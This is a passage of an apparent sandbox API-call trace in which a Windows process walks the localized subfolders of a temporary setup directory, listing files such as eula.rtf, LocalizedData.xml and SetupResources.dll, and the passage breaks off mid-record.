FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.732] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.732] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a13a8 [0158.732] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.732] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.732] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.732] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.732] FindClose (in: hFindFile=0x677cf0 | out: hFindFile=0x677cf0) returned 1 [0158.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.732] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1042", cAlternateFileName="")) returned 1 [0158.732] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.733] lstrlenW (lpString="1042") returned 4 [0158.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677cf0 [0158.733] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.733] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.733] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.733] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.733] lstrlenW (lpString="eula.rtf") returned 8 [0158.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a1468 [0158.734] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.734] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.734] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a1e38 [0158.734] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.734] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.735] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.735] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.735] FindClose (in: hFindFile=0x677cf0 | out: hFindFile=0x677cf0) returned 1 [0158.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.735] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1043", cAlternateFileName="")) returned 1 [0158.735] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.735] lstrlenW (lpString="1043") returned 4 [0158.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.736] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.736] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.736] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.736] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.736] lstrlenW (lpString="eula.rtf") returned 8 [0158.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a2518 [0158.736] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.736] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.736] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a1cb8 [0158.737] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.737] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.737] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.737] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.737] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.737] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.737] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1044", cAlternateFileName="")) returned 1 [0158.737] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.737] lstrlenW (lpString="1044") returned 4 [0158.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.737] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677cb0 [0158.739] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.739] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.739] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.739] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.739] lstrlenW (lpString="eula.rtf") returned 8 [0158.739] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a25c0 [0158.739] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.739] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.739] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.740] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a18f8 [0158.740] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.740] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.740] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.740] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.740] FindClose (in: hFindFile=0x677cb0 | out: hFindFile=0x677cb0) returned 1 [0158.740] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.740] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1045", cAlternateFileName="")) returned 1 [0158.740] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.740] lstrlenW (lpString="1045") returned 4 [0158.740] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x678130 [0158.742] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.743] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.743] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.743] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.743] lstrlenW (lpString="eula.rtf") returned 8 [0158.743] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a2a80 [0158.743] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.743] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.743] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.743] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a16b8 [0158.743] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.744] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.745] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.745] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.745] FindClose (in: hFindFile=0x678130 | out: hFindFile=0x678130) returned 1 [0158.745] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.745] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1046", cAlternateFileName="")) returned 1 [0158.745] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.745] lstrlenW (lpString="1046") returned 4 [0158.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.746] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.747] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.747] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.747] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.747] lstrlenW (lpString="eula.rtf") returned 8 [0158.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a2d20 [0158.747] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.747] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.747] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a1d78 [0158.748] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, 